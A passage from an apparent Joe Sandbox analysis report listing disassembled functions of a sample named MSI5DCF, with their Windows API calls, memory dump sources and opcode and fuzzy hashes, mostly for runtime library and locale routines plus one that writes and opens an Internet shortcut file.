                                                                        • Instruction Fuzzy Hash: 9711E9BB6007055FDB18AF39C8919FABBD1FF84768B54446CE54647A80E771AE82C740
                                                                        Function 00B13CA9 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00B13A43,00000000,00000000,?), ref: 00B13CD5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 3736152602-0
                                                                        • Opcode ID: 35f85900efa2d7cfcba19cfad228bc428d4f8ee2217d66b61fd053fecb143b38
                                                                        • Instruction ID: ca1cfa2f2ef16cbf6f3dfb43ce70e69bbbd9b6d6ed3faf1153288c34a2cb8050
                                                                        • Opcode Fuzzy Hash: 35f85900efa2d7cfcba19cfad228bc428d4f8ee2217d66b61fd053fecb143b38
                                                                        • Instruction Fuzzy Hash: 06F08632600215BBDB245725DC46AFA7BE8EB40B54F6544B4EC06A3180FA74FE82C690
                                                                        Function 00B1379C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B13A7A,00000001,?,?,-00000050,?,00B13E1C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00B137E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: d05be0a4cd3c78080bcaaa9561d86067f66d2dbe05f18624e3885d722b519944
                                                                        • Instruction ID: d78b6f820b80ae87e7119da0d376af37ea33b8542868652f5ebba78a0e1dd549
                                                                        • Opcode Fuzzy Hash: d05be0a4cd3c78080bcaaa9561d86067f66d2dbe05f18624e3885d722b519944
                                                                        • Instruction Fuzzy Hash: B0F0C8B63003046FDB149F39D885ABA7BD5FF80B68B55446CF94547690E6719D428610
                                                                        Function 00B0C7A2 Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B072CA: EnterCriticalSection.KERNEL32(?,?,00B1163A,00000000,00B311A8,0000000C,00B11601,?,?,00B0C75E,?,?,00B0AFDA,00000001,00000364,?), ref: 00B072D9
                                                                        • EnumSystemLocalesW.KERNEL32(Function_0003C795,00000001,00B310C8,0000000C,00B0CBC4,?), ref: 00B0C7DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                        • String ID:
                                                                        • API String ID: 1272433827-0
                                                                        • Opcode ID: 260547ac1b767fd1411ce792dcb31d7c79b5a4537532a2393d511556c60fde3a
                                                                        • Instruction ID: 96e14b5878c38fa46f0a2d559a40f6e8839c1f502c5cc8aaa0b6e0b5fc51bbb0
                                                                        • Opcode Fuzzy Hash: 260547ac1b767fd1411ce792dcb31d7c79b5a4537532a2393d511556c60fde3a
                                                                        • Instruction Fuzzy Hash: F3F03772A00214EFD710EF98E842B9D7BF0FB08720F20815AF4109B2E0DF7559448F40
                                                                        Function 00AF71C1 Relevance: 1.5, APIs: 1, Instructions: 32COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoEx.KERNEL32(?,00000022,00000000,00000002,?,?,00AF4EEC,00000000,00B2B6C9,00000004,00AF3D92,00B2B6C9,00000004,00AF41A5,00000000,00000000), ref: 00AF71DA
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: 638454c095f62aae10af08532e7a28eee662139a461ab88e75c4218d76a63bb6
                                                                        • Instruction ID: 45e72896ed27497437bdbc08f07706798f41833543046091b76bb842a545ed74
                                                                        • Opcode Fuzzy Hash: 638454c095f62aae10af08532e7a28eee662139a461ab88e75c4218d76a63bb6
                                                                        • Instruction Fuzzy Hash: 14E0D872698208B6D7159BFC9D1FFFE7AE8D70470AF504241F702E50D1DAA4CB00D265
                                                                        Function 00B136B6 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00B0AE3C: GetLastError.KERNEL32(?,00000008,00B103BC), ref: 00B0AE40
                                                                          • Part of subcall function 00B0AE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00B0AEE2
                                                                        • EnumSystemLocalesW.KERNEL32(00B1360F,00000001,?,?,?,00B13E7A,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00B136ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$EnumLocalesSystem
                                                                        • String ID:
                                                                        • API String ID: 2417226690-0
                                                                        • Opcode ID: d1f9153c6c32538367507ec004c2ebabb7e0a25cdf000d232a35d80fd7d16bb3
                                                                        • Instruction ID: 1dc0022e465d1c338e1a15907cfd70ae165f6aa5030581050ab6134e6db24b7a
                                                                        • Opcode Fuzzy Hash: d1f9153c6c32538367507ec004c2ebabb7e0a25cdf000d232a35d80fd7d16bb3
                                                                        • Instruction Fuzzy Hash: 1FF0E53630024967CB04AF39D8566AA7FD4EFC1B10B9A4098EA058B390D671D983C750
                                                                        Function 00B0CD1F Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00B0A4B1,?,20001004,00000000,00000002,?,?,00B09AB3), ref: 00B0CD53
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: InfoLocale
                                                                        • String ID:
                                                                        • API String ID: 2299586839-0
                                                                        • Opcode ID: d50adc65c9ccfa2bf58e64ee2411d6004d54fa01d28652cc2144fdfaf4bdb00b
                                                                        • Instruction ID: 8981456a03a9fb9155c8609f85213886db6375abe52bfe2c05331e7e5a5e2ea3
                                                                        • Opcode Fuzzy Hash: d50adc65c9ccfa2bf58e64ee2411d6004d54fa01d28652cc2144fdfaf4bdb00b
                                                                        • Instruction Fuzzy Hash: 15E04F35500218BBCF122F60DC04AAE7F56EF44750F108261FD05671A1CF319D21AAD4
                                                                        Function 00AF8553 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0002855F,00AF7E51), ref: 00AF8558
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: e6bd75025b24bd15b9d4ec24c857948da2706436ae6e08cbea7259edc016c540
                                                                        • Instruction ID: 18cc76077467091292bad09a354230491cdedf2cf4509519acb5875d5ac4dfc3
                                                                        • Opcode Fuzzy Hash: e6bd75025b24bd15b9d4ec24c857948da2706436ae6e08cbea7259edc016c540
                                                                        • Instruction Fuzzy Hash:
                                                                        Function 00B11533 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: HeapProcess
                                                                        • String ID:
                                                                        • API String ID: 54951025-0
                                                                        • Opcode ID: 4debaf1e72de13aa3b111d1bdf0df9fa55ebf2d2269333cb961e1609d1bef54c
                                                                        • Instruction ID: 4d194422aeaf06c9818e74a8acbd61d8f5f9bdeea7c8eda562f82e800d1d0ce2
                                                                        • Opcode Fuzzy Hash: 4debaf1e72de13aa3b111d1bdf0df9fa55ebf2d2269333cb961e1609d1bef54c
                                                                        • Instruction Fuzzy Hash: E7A001B06026119BE7908F7AAA0A24E3AA9AA46691795C169A405D7260EE2884A09F01
                                                                        Function 00B06078 Relevance: .7, Instructions: 655COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: AllocHeap
                                                                        • String ID:
                                                                        • API String ID: 4292702814-0
                                                                        • Opcode ID: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
                                                                        • Instruction ID: 0782a3c1417c164d8cdfaa2a199b68ef21bcaad292a7dd5be13ac5c25ec4c933
                                                                        • Opcode Fuzzy Hash: be38b7a26d08611aa2ea31345a83c278132bfa6209997761a86c1b4acfd6cd2c
                                                                        • Instruction Fuzzy Hash: 40328C74A0020ADFCF18CF98C995ABEBBF5EF55304F2441A9DD41A7385D632AE16CB90
                                                                        Function 00B0E919 Relevance: .6, Instructions: 637COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e2eb2d1cdc7c0db415a1ec2310770492e08ec697c8ac7da951c8d64bae6ea44
                                                                        • Instruction ID: 92a683ba57a2f3d72b455b49e478061d343efab10a56f3da4ff5b76ff095ccb1
                                                                        • Opcode Fuzzy Hash: 8e2eb2d1cdc7c0db415a1ec2310770492e08ec697c8ac7da951c8d64bae6ea44
                                                                        • Instruction Fuzzy Hash: 1732F721E29F424DD7335634C862336A689AFB73D5F15D737E82AB5DAAEF29C4834100
                                                                        Function 00B018EF Relevance: .2, Instructions: 158COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
                                                                        • Instruction ID: 79c9b1856f39500047fcb36f30c44c6c0a7a4d32dee7b31a80b05dce15d3a156
                                                                        • Opcode Fuzzy Hash: 241b6fb9a289495fc9e6c92dd56fb41bf9160e20364eef422bda7a05c9cbced3
                                                                        • Instruction Fuzzy Hash: 83514F72E00119AFDF18CF99C991AAEBFF6FF88310F198499E515AB241C7349E51CB50
                                                                        Function 00AF9730 Relevance: .1, Instructions: 76COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                        • Instruction ID: 00e524f45d9eb636d23f4e7cc2e2bbc1bbc6276a2467eea2d229b4a97824f3cf
                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                        • Instruction Fuzzy Hash: 54112B7B22038A43D614AFBEC8F4BB7A795EBC5321B3C437AF3428B758D22299459501
                                                                        Function 00B103E8 Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                        • Instruction ID: aef45f4408a8812e5169a4ab95ffe54f135bf8062de109ae0457add4f6d01c1c
                                                                        • Opcode Fuzzy Hash: 2864318f6dce3f34aa64f3b9f5968b0c36cd4cfae0ffe164939727a64b01d4d1
                                                                        • Instruction Fuzzy Hash: D7E08C32A2123CEBCB14EBD8C94598AF7FCEB48B00B5105AAF601D3211C2B0EE80C7D0
                                                                        Function 00B0843F Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                        • Instruction ID: 95ace362430cd0b839686c04225f8ae1ff7486d99d1d919758579178ee905085
                                                                        • Opcode Fuzzy Hash: 3dda80f92e8400fcc772db5e13d420266169146e784e576c0d4a49e31e5b18b9
                                                                        • Instruction Fuzzy Hash: 5EC08C34000A0187CE399A1082B13AC33D4F3A1782F8009CCC46A0BB83C91F9EC2D640
                                                                        Function 00AD8790 Relevance: 30.1, APIs: 13, Strings: 4, Instructions: 349filememoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00AD880D
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD8860
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD886F
                                                                        • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00AD888B
                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD896B
                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8977
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89B3
                                                                        • LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89D2
                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD89EF
                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8A83
                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 00AD8ACE
                                                                        • ShellExecuteW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000005), ref: 00AD8B1C
                                                                        • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00000000,00B1A285,000000FF), ref: 00AD8B4B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharLocalMultiWide$AllocExecuteFileFreeShell$CloseCreateHandleWrite
                                                                        • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                        • API String ID: 2199533872-3004881174
                                                                        • Opcode ID: af89aaa73f684e37faa0abd94b395940c80fd235c6cd1809413387a1a471cf20
                                                                        • Instruction ID: b973f89da5380e126b66fec62d8e8c8048a51bf4ddc2e15de177f4bf35c4584d
                                                                        • Opcode Fuzzy Hash: af89aaa73f684e37faa0abd94b395940c80fd235c6cd1809413387a1a471cf20
                                                                        • Instruction Fuzzy Hash: 6AC12171A00245AFEB209F68CC55BFFBBB5EF54700F14416AE506AB3D1EB788A05C7A1
                                                                        Function 00AF7769 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00B34AF8,00000FA0,?,?,00AF7747), ref: 00AF7775
                                                                        • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00AF7747), ref: 00AF7780
                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00AF7747), ref: 00AF7791
                                                                        • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00AF77A3
                                                                        • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00AF77B1
                                                                        • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00AF7747), ref: 00AF77D4
                                                                        • DeleteCriticalSection.KERNEL32(00B34AF8,00000007,?,?,00AF7747), ref: 00AF77F0
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00AF7747), ref: 00AF7800
                                                                        Strings
                                                                        • WakeAllConditionVariable, xrefs: 00AF77A9
                                                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00AF777B
                                                                        • kernel32.dll, xrefs: 00AF778C
                                                                        • SleepConditionVariableCS, xrefs: 00AF779D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.1733596281.0000000000AD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AD0000, based on PE: true
                                                                        • Associated: 00000003.00000002.1733565857.0000000000AD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733652436.0000000000B1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733704934.0000000000B33000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.1733730670.0000000000B37000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_ad0000_MSI5DCF.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                        • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                        • API String ID: 2565136772-3242537097
                                                                        • Opcode ID: 3f3b791a0105e7c6dc0159251c5c0e0e53009df89bc47b9ccba83b4dcb5a4669
                                                                        • Instruction ID: 409a801896403adc8ac12cd8ea51cc055832f3112fdc979f82abb4ff68e081fc
                                                                        • Opcode Fuzzy Hash: 3f3b791a0105e7c6dc0159251c5c0e0e53009df89bc47b9ccba83b4dcb5a4669
                                                                        • Instruction Fuzzy Hash: A901D431B44311ABD7212BB4BC0DEAE7AE8AB49B51B444065FD11E71A0DFB0D8008664
                                                                        Function 00ADF010 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,00000018,B7207CF4,?,00000000), ref: 00ADF076
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00ADF0B3
                                                                        • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00ADF11D
                                                                        • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00ADF2B9
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00ADF376
